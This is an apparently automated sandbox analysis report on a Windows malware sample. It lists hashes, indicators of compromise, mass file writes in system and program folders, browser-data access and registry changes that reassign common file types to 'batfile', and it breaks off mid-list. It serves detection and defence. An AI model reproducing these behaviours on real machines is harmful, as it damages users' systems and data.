Analysis
-
max time kernel
123s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
07-04-2024 21:00
Static task
static1
Behavioral task
behavioral1
Sample
e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe
Resource
win7-20240221-en
General
-
Target
e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe
-
Size
5.5MB
-
MD5
e5d8fd3aeb2df221386026d477c9a29f
-
SHA1
b0282c62eb15642255d4dcf7709a5480ba49c04c
-
SHA256
e528a7df88f2edb9a6b9d125fcf360ec4232de036f2ce9ef40c6183b957371e5
-
SHA512
e5ba2b989683672dfd02cfddf685dca91964c0a4cc89a9b398090485cc47e67a6df585c1f4e0a1c3b77b62ce65deb7122b71309226589a586167464b3967f638
-
SSDEEP
6144:btzsb5Uh28+V1WW69B9VjMdxPedN9ug0z9TB9SToScEMdFDIDIDVPQW9e7w4x4Qc:btzE5elwLz9TrszMnGGVoxU
Malware Config
Signatures
-
Drops file in Drivers directory 4 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt cmd.exe File created C:\Windows\SysWOW64\drivers\gmreadme.txt cmd.exe File opened for modification C:\Windows\System32\drivers\gmreadme.txt cmd.exe File created C:\Windows\System32\drivers\gmreadme.txt cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 64 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_command_precedence.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_objects.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_Return.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_preference_variables.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_escape_characters.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_logical_operators.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_operators.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\fr-FR\about_scopes.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_type_operators.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_scripts.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Return.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\fr-FR\about_Language_Keywords.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\ja-JP\about_eventlogs.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_locations.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\de-DE\about_Throw.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_History.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_remote.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_preference_variables.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\de-DE\about_functions_advanced_parameters.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\de-DE\about_Redirection.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_scopes.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_scripts.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Assignment_Operators.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_script_internationalization.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Special_Characters.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Ref.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\en-US\about_escape_characters.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Ref.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_functions_advanced.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\fr-FR\about_CommonParameters.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\ja-JP\about_Core_Commands.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_objects.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_command_precedence.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_do.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\ja-JP\about_aliases.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Line_Editing.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Session_Configurations.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Continue.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_remote_jobs.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_format.ps1xml.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_split.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_try_catch_finally.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_profiles.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Ref.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_escape_characters.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_For.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_regular_expressions.help.txt cmd.exe File created C:\Windows\SysWOW64\it-IT\erofflps.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_scripts.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_Path_Syntax.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\es-ES\about_Reserved_Words.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_arrays.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_execution_policies.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_remote_FAQ.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_functions_cmdletbindingattribute.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_types.ps1xml.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\de-DE\about_jobs.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_While.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\ja-JP\about_profiles.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Automatic_Variables.help.txt cmd.exe File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_remote_output.help.txt cmd.exe File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Windows_PowerShell_2.0.help.txt cmd.exe File opened for modification C:\Windows\System32\WindowsPowerShell\v1.0\fr-FR\about_Signing.help.txt cmd.exe File created C:\Windows\System32\WindowsPowerShell\v1.0\it-IT\about_try_catch_finally.help.txt cmd.exe -
Drops file in Program Files directory 64 IoCs
Processes:
cmd.execmd.exedescription ioc process File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-dock.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_ButtonGraphic.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png cmd.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Mso Example Intl Setup File A.txt cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_ButtonGraphic.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider.png cmd.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\spacer_highlights.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\WhiteDot.png cmd.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\1.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png cmd.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonSubpicture.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\whitevignette1047.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png cmd.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_MCELogo_mouseout.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png cmd.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png cmd.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\vintage.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_box_top.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\glass.png cmd.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\13.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl-hot.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\activity16v.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationRight_SelectionSubpicture.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationRight_ButtonGraphic.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png cmd.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png cmd.exe File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt cmd.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Mso Example Setup File A.txt cmd.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png cmd.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png cmd.exe File created C:\Program Files\Windows NT\TableTextService\TableTextServiceSimplifiedShuangPin.txt cmd.exe File created C:\Program Files\DVD Maker\Shared\DissolveNoise.png cmd.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png cmd.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png cmd.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png cmd.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-back-over-select.png cmd.exe -
Drops file in Windows directory 64 IoCs
Processes:
cmd.execmd.exedescription ioc process File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\12.png cmd.exe File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\docked_gray_hail.png cmd.exe File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\about_While.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft.backgroun..nt.module.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_8dbf2e4c46ccd2f2\about_BITS_Cmdlets.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\about_functions_advanced_methods.help.txt cmd.exe File opened for modification C:\Windows\winsxs\x86_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_725857cf41f74c3f\hint_up.png cmd.exe File created C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\docked_black_cloudy.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c02a16e1ae17ab94\about_Assignment_Operators.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_debuggers.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_Parsing.help.txt cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\16_9-frame-background.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_functions_advanced_parameters.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_Signing.help.txt cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c02a16e1ae17ab94\about_Windows_PowerShell_2.0.help.txt cmd.exe File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_27c74b34efa6572d\about_format.ps1xml.help.txt cmd.exe File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_it-it_b4a6b77ab9aa530d\about_For.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\calendar_single_bkg_orange.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\btn_close_over.png cmd.exe File created C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\divider-vertical.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_74b66e05cc4097c8\about_CommonParameters.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_1da743febb1ea38d\about_profiles.help.txt cmd.exe File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\about_pssessions.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\cronometer_h.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-s..inboxgames-freecell_31bf3856ad364e35_6.1.7600.16385_none_b466b741b68bd29a\FreeCellMCE.png cmd.exe File opened for modification C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\docked_black_cloudy.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c02a16e1ae17ab94\about_jobs.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_scopes.help.txt cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_remote.help.txt cmd.exe File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_en-us_27fbee50ef7f6588\about_aliases.help.txt cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_ce76f352fa54bd75\settings_corner_top_left.png cmd.exe File created C:\Windows\winsxs\x86_microsoft-windows-gadgets-currency_31bf3856ad364e35_6.1.7600.16385_none_679a6ba79b07a3c0\add_over.png cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_escape_characters.help.txt cmd.exe File created C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_remote_troubleshooting.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\bg-dock.png cmd.exe File opened for modification C:\Windows\winsxs\x86_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_725857cf41f74c3f\daisies.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_4c778c357864a2ed\about_escape_characters.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_split.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_transactions.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-currency_31bf3856ad364e35_6.1.7600.16385_none_c3b9072b536514f6\base-undocked-3.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\28.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-huecycle_31bf3856ad364e35_6.1.7600.16385_none_810df6f57d9f2a73\15x15dot.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-printing-fdprint_31bf3856ad364e35_6.1.7600.16385_none_b425025e9ef3d84c\device.png cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_Continue.help.txt cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-rssfeedsgadget_31bf3856ad364e35_6.1.7600.16385_none_07861dacd36a18f4\buttonUp_On.png cmd.exe File created C:\Windows\winsxs\x86_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_4db0b909695af8f9\docked_gray_snow.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_es-es_1d72a0e2bb459532\about_Automatic_Variables.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_Reserved_Words.help.txt cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_56cc3687acc564e8\about_format.ps1xml.help.txt cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\info.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-s..c-mceburnengineicon_31bf3856ad364e35_6.1.7600.16385_none_0a0899f37b2bab4d\SonicMCEBurnEngineIcon.png cmd.exe File opened for modification C:\Windows\ehome\en-US\playready_eula.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\docked_black_few-showers.png cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_ca7ec133e2786d8f\about_While.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-babygirl_31bf3856ad364e35_6.1.7600.16385_none_b2bd01695c9021fd\16_9-frame-highlight.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-flippage_31bf3856ad364e35_6.1.7600.16385_none_0f19716417635239\pagecurl.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\content-background.png cmd.exe File opened for modification C:\Windows\winsxs\x86_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_725857cf41f74c3f\timer_down.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_c02a16e1ae17ab94\about_command_precedence.help.txt cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-g..ets-slideshowgadget_31bf3856ad364e35_6.1.7600.16385_none_815d27dbb889ba17\next_rest.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\rings-desk.png cmd.exe File created C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\diner_settings.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-clock_31bf3856ad364e35_6.1.7600.16385_none_3342e6899aa0557f\trad_h.png cmd.exe File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\btn_close_down_BIDI.png cmd.exe File opened for modification C:\Windows\winsxs\wow64_microsoft-windows-p..ll-preloc.resources_31bf3856ad364e35_6.1.7600.16385_de-de_7f0b185800a159c3\about_remote.help.txt cmd.exe -
Modifies registry class 10 IoCs
Processes:
cmd.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4\ = "batfile" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.png\ = "batfile" cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3 cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mp3\ = "batfile" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mp4 cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.png cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.txt cmd.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.execmd.exedescription pid process target process PID 2648 wrote to memory of 2896 2648 e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe cmd.exe PID 2648 wrote to memory of 2896 2648 e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe cmd.exe PID 2648 wrote to memory of 2896 2648 e5d8fd3aeb2df221386026d477c9a29f_JaffaCakes118.exe cmd.exe PID 2896 wrote to memory of 2356 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2356 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2356 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2376 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2376 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2376 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 956 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 956 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 956 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 1440 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 1440 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 1440 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2656 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2656 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2656 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2664 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2664 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2664 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2528 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2528 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2528 2896 cmd.exe cmd.exe PID 2896 wrote to memory of 2536 2896 cmd.exe cmd.exe PID 2896 